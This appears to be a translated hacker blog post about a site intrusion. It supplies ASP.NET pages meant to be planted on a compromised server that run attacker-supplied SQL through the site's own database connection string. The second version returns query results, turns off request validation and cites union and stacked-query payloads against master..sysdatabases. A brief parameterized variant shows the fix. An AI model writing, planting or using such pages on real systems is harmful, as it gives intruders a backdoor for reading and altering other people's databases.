Yesterday 4z1 and I were looking at a site. Privilege escalation was really hard to get; we spent a full 5 hours on it with nothing to show. 2008 + IIS7, no sa, no root, no services of any kind...
Along the way we actually needed an aspx page that constructs an injection to go cross-site; I found a pile of code online and not one of them worked.
It's not much code, so I just wrote one myself and was done with it. So annoying.
<%@ Page Language="C#" AutoEventWireup="true" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 aspx injection-construction page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

 void Page_Init(object sender, EventArgs e)
 {
 // Reuse the connection string the target site already keeps in web.config
 // (replace "ConnectionName" with the name used there).
 System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
 conn.ConnectionString = System.Configuration.ConfigurationManager.ConnectionStrings["ConnectionName"].ConnectionString;
 conn.Open();

 string i = this.Page.Request.Params["xxser"]; // the injection parameter: ?xxser=1

 // Deliberately concatenated: whatever follows xxser= runs as SQL on the site's own connection.
 System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [Table] where [Column] = " + i, conn);
 // ExecuteNonQuery returns the affected-row count of the batch; for a plain SELECT it returns -1,
 // so this page suits stacked INSERT/UPDATE/EXEC payloads rather than reading rows back.
 int x = command.ExecuteNonQuery();
 Response.Write(i + "\n");
 Response.Write(x);
 conn.Close();
 }

</script>
</div>
</form>
</body>
</html>
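The page above runs the injected batch with ExecuteNonQuery, which returns -1 for a SELECT, so nothing that is selected ever reaches the browser. The following is an added example (my code, not the original post's) that reads the result set back with ExecuteReader and walks any further result sets produced by stacked statements, and next to it the parameterized form of the same lookup, which the same payload no longer gets through. The connection-string name "ConnectionName", the table and column names, and the "safe" query-string switch are placeholders I chose; the ValidateRequest note reflects how ASP.NET request validation behaves, not anything the original page configures.

```csharp
<%@ Page Language="C#" AutoEventWireup="true" ValidateRequest="false" %>
<%-- ValidateRequest="false" stops ASP.NET request validation from rejecting payloads that contain
     characters such as '<'; on .NET 4.x this page-level switch only takes effect together with
     <httpRuntime requestValidationMode="2.0" /> in web.config. --%>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Connection-string name is an assumption: use whatever the target site's web.config defines.
    static string ConnString()
    {
        return ConfigurationManager.ConnectionStrings["ConnectionName"].ConnectionString;
    }

    // Vulnerable lookup: xxser is concatenated into the batch. ExecuteReader returns every result set,
    // so both "1 union select name,null from master..sysdatabases" and stacked "1; select ..." payloads
    // come back as rows instead of the -1 that ExecuteNonQuery reports for a SELECT.
    static void DumpUnsafe(SqlConnection conn, string i, HttpResponse resp)
    {
        using (SqlCommand cmd = new SqlCommand("select * from [Table] where [Column] = " + i, conn))
        using (SqlDataReader r = cmd.ExecuteReader())
        {
            int set = 0;
            do
            {
                resp.Write("-- result set " + (set++) + "\n");
                for (int c = 0; c < r.FieldCount; c++) resp.Write(r.GetName(c) + "\t");
                resp.Write("\n");
                while (r.Read())
                {
                    for (int c = 0; c < r.FieldCount; c++) resp.Write(Convert.ToString(r[c]) + "\t");
                    resp.Write("\n");
                }
            } while (r.NextResult()); // each stacked SELECT in the batch yields another result set
        }
    }

    // Hardened form of the same lookup: the value travels as a typed parameter, never as SQL text,
    // and int.Parse rejects anything that is not a single integer before the query is even sent.
    static int CountSafe(SqlConnection conn, string i)
    {
        using (SqlCommand cmd = new SqlCommand("select count(*) from [Table] where [Column] = @v", conn))
        {
            cmd.Parameters.Add("@v", SqlDbType.Int).Value = int.Parse(i);
            return (int)cmd.ExecuteScalar();
        }
    }

    void Page_Load(object sender, EventArgs e)
    {
        Response.ContentType = "text/plain";
        // Request.Params also reads form fields and cookies, so a long payload can be POSTed
        // instead of being squeezed into the query string.
        string i = Request.Params["xxser"];
        if (string.IsNullOrEmpty(i)) { Response.Write("usage: ?xxser=<value>[&safe=1]\n"); return; }

        using (SqlConnection conn = new SqlConnection(ConnString()))
        {
            conn.Open();
            if (Request.Params["safe"] == "1")
                Response.Write("rows: " + CountSafe(conn, i) + "\n"); // ?xxser=1;select 1&safe=1 -> FormatException
            else
                DumpUnsafe(conn, i, Response);
        }
    }
</script>
```

The page has to sit inside the target application so that the named connection string resolves and the query runs under the site's own database login; requesting the same URL with safe=1 shows why the payload gets nowhere once the value is bound as a parameter instead of concatenated.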